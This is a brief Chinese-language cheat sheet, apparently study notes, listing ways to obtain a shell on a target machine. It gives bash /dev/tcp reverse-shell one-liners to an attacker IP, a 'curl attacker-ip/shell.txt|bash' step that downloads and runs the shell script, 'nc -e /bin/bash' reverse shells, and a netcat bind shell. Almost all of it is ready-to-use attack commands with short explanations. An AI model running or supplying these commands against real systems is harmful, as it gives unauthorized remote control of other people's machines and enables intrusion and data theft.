說明:端口可任意,但要保持一致而且不能被佔用,以下均爲攻擊機登錄被攻擊機
bash連接
攻擊機器輸入 nc -lvp 7777
被攻擊機器輸入bash -i >& /dev/tcp/攻擊機ip/7777 0>&1
然後攻擊機器就相當於登陸了了被攻擊機器
curl連接
在攻擊機根目錄下創建shell.txt,內容爲bash -i >& /dev/tcp/攻擊機ip/7777 0>&1
//注意shell.txt不是在服務器根目錄,而是例如/var/www/html下
被攻擊機執行curl 攻擊機ip/shell.txt|bash //先curl獲得shell.txt的內容然後用bash執行
nc連接
說明:用nc連接成功後不會出現類似bash連接那種開頭的root@kali這種,可用pwd檢測是否連接成功
利用攻擊機ip
攻擊機輸入 nc -lvp 7777
被攻擊機輸入 nc -e /bin/bash 攻擊機ip 7777
利用被攻擊機ip
其他都是需要攻擊機ip,這個則相反。我的理解是需要攻擊機ip的相當於把shell彈給攻擊機(所以攻擊機ip和bash在一行代碼),而這個相當於在本地端口開個shell,攻擊機訪問端口來拿shell
攻擊機輸入 nc 被攻擊機ip 7777
被攻擊機輸入 nc -lvp 7777 -e /bin/bash